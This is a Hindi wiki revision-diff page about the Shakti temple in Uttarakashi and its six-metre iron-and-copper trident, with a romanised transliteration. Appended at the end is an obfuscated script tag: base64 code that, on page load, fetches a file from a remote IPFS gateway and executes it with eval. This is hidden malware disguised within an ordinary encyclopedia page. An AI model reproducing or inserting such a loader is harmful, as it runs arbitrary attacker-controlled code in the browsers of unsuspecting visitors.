Difference between revisions of "शक्ति मंदिर उत्तरकाशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (शक्‍ित मंदिर उत्तरकाशी का नाम बदलकर शक्ति मंदिर उत्तरकाशी कर दिया गया है)
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
*[[उत्तरकाशी]] में [[विश्‍वनाथ मंदिर उत्तरकाशी|विश्‍वनाथ मंदिर]] के दायीं ओर शक्‍ित मंदिर है।  
+
*[[उत्तरकाशी]] में [[विश्‍वनाथ मंदिर उत्तरकाशी|विश्‍वनाथ मंदिर]] के दायीं ओर शक्ति मंदिर है।  
 
*इस मंदिर में 6 मीटर ऊँचा तथा 90 सेंटीमीटर परिधि वाला एक बड़ा त्रिशूल स्‍थापित है।  
 
*इस मंदिर में 6 मीटर ऊँचा तथा 90 सेंटीमीटर परिधि वाला एक बड़ा त्रिशूल स्‍थापित है।  
 
*इस त्रिशूल का ऊपरी भाग लो‍हे का है तथा निचला भाग ताँबे का है।  
 
*इस त्रिशूल का ऊपरी भाग लो‍हे का है तथा निचला भाग ताँबे का है।  
*पौराणिक कथाओं के अनुसार देवी [[दुर्गा]] (शक्‍ित) ने इसी त्रिशूल से दानवों को मारा था।  
+
*पौराणिक कथाओं के अनुसार देवी [[दुर्गा]] (शक्ति) ने इसी त्रिशूल से दानवों को मारा था।  
 
*बाद में इन्‍हीं के नाम पर यहाँ इस मंदिर की स्‍थापना की गई।
 
*बाद में इन्‍हीं के नाम पर यहाँ इस मंदिर की स्‍थापना की गई।
 
{{प्रचार}}
 
{{प्रचार}}

Latest revision as of 11:37, 22 February 2011

  • uttarakashi mean vishh‍vanath mandir ke dayian or shakti mandir hai.
  • is mandir mean 6 mitar ooancha tatha 90 seantimitar paridhi vala ek b da trishool sh‍thapit hai.
  • is trishool ka oopari bhag lo‍he ka hai tatha nichala bhag taanbe ka hai.
  • pauranik kathaoan ke anusar devi durga (shakti) ne isi trishool se danavoan ko mara tha.
  • bad mean inh‍hian ke nam par yahaan is mandir ki sh‍thapana ki gee.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>